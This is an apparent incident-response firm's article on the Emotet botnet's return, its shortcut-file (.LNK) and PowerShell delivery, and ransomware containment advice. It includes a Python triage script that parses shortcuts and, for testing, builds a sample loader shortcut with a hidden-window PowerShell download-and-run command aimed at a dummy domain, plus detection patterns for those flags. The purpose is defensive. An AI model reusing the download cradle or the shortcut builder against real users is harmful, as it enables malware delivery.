The Emotet Malware & Botnet is Back
A new wave of ransomware infections is all but inevitable. Ransomware is malware that encrypts your systems and files and withholds access until a ransom is paid, usually in Bitcoin or another cryptocurrency that is hard to trace. The attackers direct the victim to deposit the ransom in a cryptocurrency wallet; the amounts vary but are generally large, with reported average payments of over $500k in 2021.
Removing Emotet and recovering from it is difficult on its own, and far more difficult if a ransomware payload has also been delivered and detonated. The ransomware operators may also steal data and threaten to release it if they are not paid; either way, they hold the company to ransom. Before any of this can happen, the threat actors need a way in. That is where malware groups and their stealthy botnets come into play, such as the one behind the Emotet trojan (also known as Heodo).
Until it was disrupted in January 2021, Emotet and its supporting infrastructure formed what Europol called the world's most dangerous malware. Its role in the criminal economy was, and is again, to gain a foothold in networks and then sell that access to other threat actors who want to be inside a computer or network. The buyer may be a group after intellectual property, but more often it is a ransomware crew: Emotet infections typically led to loaders such as TrickBot, which in turn delivered ransomware such as Ryuk. Think of Emotet as the burglar who picks the lock (steals credentials), breaks in, and installs a hidden door for future access and for spreading further infections through the network.
Emotet was taken down in January 2021 through coordinated international law-enforcement action, but it has returned with more capability than before. It needs only one user to open a malicious attachment or shortcut; from that first host it harvests credentials and email content and uses its spreader modules (for example, brute-forcing SMB shares with stolen or common passwords) to move laterally, so a single infected email can quickly become a network-wide problem. Even if you have not yet been ransomed, an Emotet infection should be treated as a serious incident and contained rapidly. Earlier versions of Emotet relied on Microsoft Office macros; Microsoft now blocks macros in files downloaded from the Internet by default, although users can still unblock them. Current campaigns instead deliver Windows shortcut files (.LNK) whose target is a PowerShell command line; LNK-based loaders commonly hide the PowerShell window and obfuscate or base64-encode the command. A shortcut looks like an ordinary file and launches a signed, trusted Windows binary, which makes this delivery method easy to overlook and hard to detect with controls that only watch for macro-enabled documents.
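The shortcut-based delivery described above is straightforward to triage once you know where the command line lives inside the file. The following is an added example, not code from the original article or from any Emotet analysis: a small Python parser for the Shell Link (.LNK) binary format that pulls out the name, target path, arguments and window setting, flags the markers of a PowerShell loader (hidden window, execution-policy bypass, an encoded command), and decodes the base64 UTF-16LE payload that `-EncodedCommand` carries. The sample shortcut it runs on is constructed inline with a dummy download cradle pointing at a reserved `.invalid` domain; it is not a real Emotet artifact, and the parameter spellings it matches (`-enc`, `-w hidden`, `-ep bypass`) are assumptions, since powershell.exe also accepts other abbreviations.

```python
"""Triage Windows shortcut (.LNK) files that launch PowerShell (added example)."""
import base64
import re
import struct

# LinkFlags bits from the MS-SHLLINK specification (section 2.1.1).
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand value: window starts minimized and inactive

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))


def parse_lnk(data: bytes) -> dict:
    """Parse the ShellLinkHeader and StringData section of a .LNK file.

    The LinkTargetIDList and LinkInfo blocks are skipped, not decoded; the
    StringData fields (name, relative path, arguments, ...) are what triage needs.
    """
    if (len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link (.LNK) file")
    flags, = struct.unpack_from("<I", data, 20)
    show_command, = struct.unpack_from("<I", data, 60)
    pos = 76
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize (u16) followed by the IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize (u32) counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    info = {"flags": flags, "show_command": show_command}
    for flag, key in STRING_FIELDS:
        if not flags & flag:
            continue
        count, = struct.unpack_from("<H", data, pos)   # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            info[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            info[key] = data[pos:pos + count].decode("cp1252", errors="replace")
            pos += count
    return info


# powershell.exe accepts any unambiguous prefix of -EncodedCommand; only the
# common spellings are listed here (assumption), so a production check should be looser.
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_RE = re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+hidden", re.I)
BYPASS_RE = re.compile(r"(?:^|\s)-e(?:xecutionpolicy|p)\s+bypass", re.I)


def triage_lnk(data: bytes) -> dict:
    """Return loader indicators found in a shortcut plus the decoded command, if any."""
    info = parse_lnk(data)
    args = info.get("arguments", "")
    target = " ".join(info.get(k, "") for k in ("relative_path", "working_dir", "icon_location"))
    findings = []
    if "powershell" in target.lower() or "powershell" in args.lower():
        findings.append("launches powershell")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window starts minimized")
    if HIDDEN_RE.search(args):
        findings.append("hidden window")
    if BYPASS_RE.search(args):
        findings.append("execution policy bypass")
    decoded = None
    match = ENCODED_RE.search(args)
    if match:
        try:
            # -EncodedCommand takes base64 of the UTF-16LE script text.
            decoded = base64.b64decode(match.group(1)).decode("utf-16-le")
            findings.append("base64-encoded command")
        except (ValueError, UnicodeDecodeError):
            findings.append("malformed encoded command")
    return {"info": info, "findings": findings, "decoded_command": decoded}


def _string_data(text: str) -> bytes:
    return struct.pack("<H", len(text)) + text.encode("utf-16-le")


def build_lnk(name: str, relative_path: str, arguments: str, show_command: int = 1) -> bytes:
    """Build a minimal Unicode .LNK carrying only StringData (used for constructed samples)."""
    flags = HAS_NAME | HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack(
        "<IIQQQIiIHHII", flags, 0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    return header + _string_data(name) + _string_data(relative_path) + _string_data(arguments)


# CONSTRUCTED sample: mimics the LNK-to-PowerShell pattern with a dummy download
# cradle pointing at a reserved .invalid domain. It is not a real Emotet file.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
SAMPLE_LNK = build_lnk(
    "Invoice",
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-w hidden -ep bypass -enc " + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode(),
    show_command=SW_SHOWMINNOACTIVE,
)

if __name__ == "__main__":
    result = triage_lnk(SAMPLE_LNK)
    for finding in result["findings"]:
        print("[!]", finding)
    print("decoded:", result["decoded_command"])
```

Run `triage_lnk` over every `.LNK` pulled from mail attachments, archives or user download folders; a shortcut whose target is powershell.exe, cmd.exe, mshta.exe or similar with a hidden window and an encoded or obfuscated command is worth quarantining regardless of what the icon says. The parser deliberately skips the IDList and LinkInfo blocks, so an absolute local path stored only there is not extracted; the relative path and arguments are what loaders rely on.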
A Little More About Emotet Malware
Emotet includes functionality that helps it evade some anti-malware products, and it uses worm-like spreader modules to reach other computers on the same network, which accelerates distribution. This is why the Department of Homeland Security has described Emotet as among the most costly and destructive malware affecting government, the private sector, individuals and organizations, with clean-up costing up to $1M per incident for larger organizations. Emotet spreads primarily through malicious email (malspam) carrying weaponized attachments or links; once established on a host, it in turn drops other malware, such as TrickBot and QakBot, onto the infected system. Finding the initial entry point on a system is difficult because the first-stage component deletes itself after the initial execution, so analysts may struggle to locate the original infection vector (it is the Emotet loader that does this, not the ransomware that may follow). The dropper creates a file to hold the payload; if that file creation fails, it falls back to writing the payload into its own directory, which leaves artifacts in an unexpected place and complicates cleanup.
How Long Do Ransomware Incidents Normally Last?
Incidents involving Emotet tend to run longer than those involving other ransomware-enabling malware, partly because of the large ransoms demanded in Bitcoin by the follow-on ransomware operators and partly because finding and eradicating Emotet on every host it has reached is labor-intensive. We typically see about seven days from the start of recovery until the most vital systems are back online, though it can take longer. The remaining critical systems typically take another seven days to recover.
What Should You Do?
If you have been attacked by Emotet, whether or not you have yet been held to ransom, disconnect your systems from the Internet immediately, and where possible isolate affected systems from the rest of the network as well. Do not let anyone convince you to wait. Do it IMMEDIATELY. You may well save yourself and your entire organization from a trojan infection (bad enough on its own) turning into a ransomware event: cutting network access severs the malware from its command-and-control servers and typically prevents the encryption stage from being triggered. Some people shut down systems suspected of being infected, but this has its own problems. While powering off is an option, it discards the volatile evidence in memory that investigators need, and it sometimes corrupts the operating system and data in ways that prevent subsequent recovery, even if a ransom is paid.
If you suspect you are the victim of an attack, contact us immediately, at any hour of the day, including holidays and weekends. Please don't wait: minutes, even seconds, really do matter. Our team will intervene with deep expertise, precision, agility and promptness to restore the functionality and IT security of your organization.
We are available 24×7, 365 days a year, at (877) NOC-NOC4 or (877) 662-6624. Or you can reach out to us via the form or chat on this page.